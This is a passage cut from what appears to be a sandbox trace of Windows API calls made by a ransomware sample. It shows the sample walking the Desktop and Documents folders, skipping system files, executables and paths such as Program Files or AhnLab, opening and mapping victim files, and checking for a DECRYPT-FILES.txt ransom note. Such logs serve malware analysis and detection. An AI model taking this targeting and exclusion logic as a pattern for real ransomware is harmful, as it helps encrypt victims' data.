returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.791] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="qUqlKc5CiBNKH6.mkv.TNBUDN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv.TNBUDN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv.TNBUDN" [0184.791] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv.TNBUDN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quqlkc5cibnkh6.mkv.tnbudn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.791] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=16762) returned 1 [0184.791] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.791] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.792] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.792] CloseHandle (hObject=0x260) returned 1 [0184.792] CloseHandle (hObject=0x25c) returned 1 [0184.792] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.793] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe14daa0, ftCreationTime.dwHighDateTime=0x1d4cff2, ftLastAccessTime.dwLowDateTime=0x37bd44e0, ftLastAccessTime.dwHighDateTime=0x1d4d11b, ftLastWriteTime.dwLowDateTime=0xae073300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x100ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", cAlternateFileName="RFKFJ2~1.ABT")) returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="DECRYPT-FILES.txt") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="autorun.inf") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="boot.ini") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="desktop.ini") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="ntuser.dat") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="iconcache.db") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="bootsect.bak") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="ntuser.dat.log") returned 1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="thumbs.db") returned -1 [0184.793] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R", lpString2="Bootfont.bin") returned 1 [0184.793] lstrlenW (lpString="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R") returned 30 [0184.793] lstrcmpiW (lpString1="aBTC60R", lpString2="lnk") returned -1 [0184.793] lstrcmpiW (lpString1="aBTC60R", lpString2="exe") returned -1 [0184.793] lstrcmpiW (lpString1="aBTC60R", lpString2="sys") returned -1 [0184.793] lstrcmpiW (lpString1="aBTC60R", lpString2="dll") returned -1 [0184.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.793] lstrlenW (lpString="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R") returned 30 [0184.793] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.793] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="RfkfJ2oClDUlU_N3bh.mkv.aBTC60R" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv.aBTC60R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv.aBTC60R" [0184.793] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv.aBTC60R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfkfj2ocldulu_n3bh.mkv.abtc60r"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.793] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=65707) returned 1 [0184.794] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.794] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.794] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.794] CloseHandle (hObject=0x260) returned 1 [0184.795] CloseHandle (hObject=0x25c) returned 1 [0184.795] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.795] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb58ce5a0, ftCreationTime.dwHighDateTime=0x1d4c8b6, ftLastAccessTime.dwLowDateTime=0x87843d0, ftLastAccessTime.dwHighDateTime=0x1d4d501, ftLastWriteTime.dwLowDateTime=0xae099460, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xebd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-Py95c3wNN.mkv.UFAF", cAlternateFileName="S-PY95~1.UFA")) returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="DECRYPT-FILES.txt") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="autorun.inf") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="boot.ini") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="desktop.ini") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="ntuser.dat") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="iconcache.db") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="bootsect.bak") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="ntuser.dat.log") returned 1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="thumbs.db") returned -1 [0184.795] lstrcmpiW (lpString1="S-Py95c3wNN.mkv.UFAF", lpString2="Bootfont.bin") returned 1 [0184.795] lstrlenW (lpString="S-Py95c3wNN.mkv.UFAF") returned 20 [0184.795] lstrcmpiW (lpString1="UFAF", lpString2="lnk") returned 1 [0184.795] lstrcmpiW (lpString1="UFAF", lpString2="exe") returned 1 [0184.795] lstrcmpiW (lpString1="UFAF", lpString2="sys") returned 1 [0184.795] lstrcmpiW (lpString1="UFAF", lpString2="dll") returned 1 [0184.795] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.795] lstrlenW (lpString="S-Py95c3wNN.mkv.UFAF") returned 20 [0184.795] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.795] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="S-Py95c3wNN.mkv.UFAF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv.UFAF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv.UFAF" [0184.795] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv.UFAF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-py95c3wnn.mkv.ufaf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.796] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=60371) returned 1 [0184.796] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.796] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.797] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.797] CloseHandle (hObject=0x260) returned 1 [0184.797] CloseHandle (hObject=0x25c) returned 1 [0184.797] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.797] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8812a0, ftCreationTime.dwHighDateTime=0x1d4cb34, ftLastAccessTime.dwLowDateTime=0x564a2710, ftLastAccessTime.dwHighDateTime=0x1d4d441, ftLastWriteTime.dwLowDateTime=0xae0e5720, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1854b, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY32Gl.swf.r84CZ", cAlternateFileName="VY32GL~1.R84")) returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="autorun.inf") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="boot.ini") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="desktop.ini") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="ntuser.dat") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="iconcache.db") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="bootsect.bak") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="ntuser.dat.log") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="thumbs.db") returned 1 [0184.797] lstrcmpiW (lpString1="vY32Gl.swf.r84CZ", lpString2="Bootfont.bin") returned 1 [0184.797] lstrlenW (lpString="vY32Gl.swf.r84CZ") returned 16 [0184.797] lstrcmpiW (lpString1="r84CZ", lpString2="lnk") returned 1 [0184.797] lstrcmpiW (lpString1="r84CZ", lpString2="exe") returned 1 [0184.797] lstrcmpiW (lpString1="r84CZ", lpString2="sys") returned -1 [0184.797] lstrcmpiW (lpString1="r84CZ", lpString2="dll") returned 1 [0184.797] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.797] lstrlenW (lpString="vY32Gl.swf.r84CZ") returned 16 [0184.797] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.797] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="vY32Gl.swf.r84CZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf.r84CZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf.r84CZ" [0184.797] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf.r84CZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy32gl.swf.r84cz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.798] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=99659) returned 1 [0184.798] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.798] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.799] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.799] CloseHandle (hObject=0x260) returned 1 [0184.799] CloseHandle (hObject=0x25c) returned 1 [0184.799] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.799] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8812a0, ftCreationTime.dwHighDateTime=0x1d4cb34, ftLastAccessTime.dwLowDateTime=0x564a2710, ftLastAccessTime.dwHighDateTime=0x1d4d441, ftLastWriteTime.dwLowDateTime=0xae0e5720, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1854b, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY32Gl.swf.r84CZ", cAlternateFileName="VY32GL~1.R84")) returned 0 [0184.799] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0184.799] CloseHandle (hObject=0x254) returned 1 [0184.799] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaf736560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf736560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0184.799] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0184.799] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0184.799] lstrcatW (in: lpString1="Documents", lpString2="\\" | out: lpString1="Documents\\") returned="Documents\\" [0184.799] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Program Files") returned 0x0 [0184.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch=":\\Windows") returned 0x0 [0184.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Games\\") returned 0x0 [0184.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.799] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\All Users") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="AhnLab") returned 0x0 [0184.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.800] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.800] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\0a16c9.tmp") returned 51 [0184.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0184.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.800] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.800] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\DECRYPT-FILES.txt") returned 58 [0184.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.801] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0184.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf0daaea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0daaea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0184.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.801] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf0daaea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0daaea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.801] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5401890, ftCreationTime.dwHighDateTime=0x1d560ed, ftLastAccessTime.dwLowDateTime=0x4b6d4640, ftLastAccessTime.dwHighDateTime=0x1d52b23, ftLastWriteTime.dwLowDateTime=0xae1319e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1999, dwReserved0=0x0, dwReserved1=0x0, cFileName="-keodEgSHy.xlsx.E3kjv", cAlternateFileName="-KEODE~1.E3K")) returned 1 [0184.801] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="DECRYPT-FILES.txt") returned 1 [0184.801] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="autorun.inf") returned 1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="boot.ini") returned 1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="desktop.ini") returned 1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="ntuser.dat") returned -1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="iconcache.db") returned 1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="bootsect.bak") returned 1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="ntuser.dat.log") returned -1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="thumbs.db") returned -1 [0184.802] lstrcmpiW (lpString1="-keodEgSHy.xlsx.E3kjv", lpString2="Bootfont.bin") returned 1 [0184.802] lstrlenW (lpString="-keodEgSHy.xlsx.E3kjv") returned 21 [0184.802] lstrcmpiW (lpString1="E3kjv", lpString2="lnk") returned -1 [0184.802] lstrcmpiW (lpString1="E3kjv", lpString2="exe") returned -1 [0184.802] lstrcmpiW (lpString1="E3kjv", lpString2="sys") returned -1 [0184.802] lstrcmpiW (lpString1="E3kjv", lpString2="dll") returned 1 [0184.802] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.802] lstrlenW (lpString="-keodEgSHy.xlsx.E3kjv") returned 21 [0184.802] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.802] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="-keodEgSHy.xlsx.E3kjv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx.E3kjv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx.E3kjv" [0184.802] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx.E3kjv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-keodegshy.xlsx.e3kjv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.802] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=6553) returned 1 [0184.803] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.803] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.803] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.803] CloseHandle (hObject=0x260) returned 1 [0184.803] CloseHandle (hObject=0x25c) returned 1 [0184.804] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.804] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e6f580, ftCreationTime.dwHighDateTime=0x1d4d2b1, ftLastAccessTime.dwLowDateTime=0x3f550a00, ftLastAccessTime.dwHighDateTime=0x1d4c89f, ftLastWriteTime.dwLowDateTime=0xae157b40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6a37, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_DUtxFwiSOA_.ods.lZvocw", cAlternateFileName="-_DUTX~1.LZV")) returned 1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="DECRYPT-FILES.txt") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="autorun.inf") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="boot.ini") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="desktop.ini") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="ntuser.dat") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="iconcache.db") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="bootsect.bak") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="ntuser.dat.log") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="thumbs.db") returned -1 [0184.804] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods.lZvocw", lpString2="Bootfont.bin") returned -1 [0184.804] lstrlenW (lpString="-_DUtxFwiSOA_.ods.lZvocw") returned 24 [0184.804] lstrcmpiW (lpString1="lZvocw", lpString2="lnk") returned 1 [0184.804] lstrcmpiW (lpString1="lZvocw", lpString2="exe") returned 1 [0184.804] lstrcmpiW (lpString1="lZvocw", lpString2="sys") returned -1 [0184.804] 